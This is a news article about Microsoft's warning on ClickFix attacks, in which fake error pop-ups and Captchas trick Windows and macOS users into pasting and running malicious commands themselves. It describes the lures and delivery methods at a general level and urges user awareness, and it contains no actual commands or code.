Microsoft Warns All Windows Users—This Message Is An Attack

Do not be tricked by this attack.

getty

“Think before you Click,” Microsoft has just warned all Windows PC users — adding that macOS users are also not immune from a plague of attacks that is now “targeting thousands of enterprise and end-user devices globally every day.”

We’re talking ClickFix, the devastating social engineering that has tricked millions of device users into attacking themselves, running malicious scripts on PCs or Macs after responding to an on-screen message warning of a technical or security issue.

The scripts ultimately install malware on those machines. “These payloads affect Windows and macOS devices,” Microsoft says, “and typically lead to information theft and data exfiltration.” But the malware can be anything, including a form of initial access for ransomware or an entry point to attack wider enterprise networks.

ForbesChange Your PayPal Password Now If It’s On This ListBy Zak Doffman

ClickFix initially came to prominence as a technical support popup before expanding to Captchas. Fake challenges to access websites now present a copy, paste, run instruction as an alternative challenge to selecting cars and buses or reorienting an image.

“It typically gives the users instructions that involve clicking prompts and copying, pasting, and running commands directly in the Windows Run dialog box, Windows Terminal, or Windows PowerShell. It’s often combined with delivery vectors such as phishing, malvertising, and drive-by compromises, most of which even impersonate legitimate brands and organizations to further reduce suspicion from their targets.”

That ClickFix needs this user action should be its undoing. Whatever way it’s presented, if you know not to paste and run an script in Windows then you can never be duped. But despite the scale of these attacks, that awareness has not yet bedded down.

“Because ClickFix relies on human intervention to launch the malicious commands,” Microsoft says, it can bypass “conventional and automated security solutions.” Security teams can “reduce the impact of this technique by educating users in recognizing its lures and by implementing policies that will harden device configurations.”

Microsoft’s new report is the most exhaustive I’ve seen on ClickFix, and it neatly sets out a wide range of lures and variations on the theme. But per the image above, you can see how easy it is to tell a ClickFix attack when you know what to look for. Meanwhile, the lures and facades are limitless and will continue to evolve.

Ultimately, ClickFix relies on its simplicity. As Microsoft says, “a typical ClickFix attack begins with threat actors using phishing emails, malvertisements, or compromised websites to lead unsuspecting users to a visual lure — usually a landing page — and trick them into executing a malicious command themselves.” But if you know, you know.

ForbesMicrosoft Confirms Free Upgrade Offer—Just For iPhone UsersBy Zak Doffman

And that will always be the key takeaway with ClickFix. Even as “threat actors adapt and improve certain elements of the technique to further evade detection,” which includes obfuscating the JavaScript that generates the visual lures or downloading parts of the code from different servers,” the money shot is the same. Copy, paste, run.

The hope has to be that there is so much publicity around ClickFix — of which Microsoft’s report is the latest, that users will catch on.

A socially engineered attack needs a socially engineered solution. And while Microsoft’s mitigation recommendations are steeped in security defenses and shoring up enterprise systems with its own tools, the reality is that this is all about user awareness.

Once you know, you know. And then you can’t be tricked.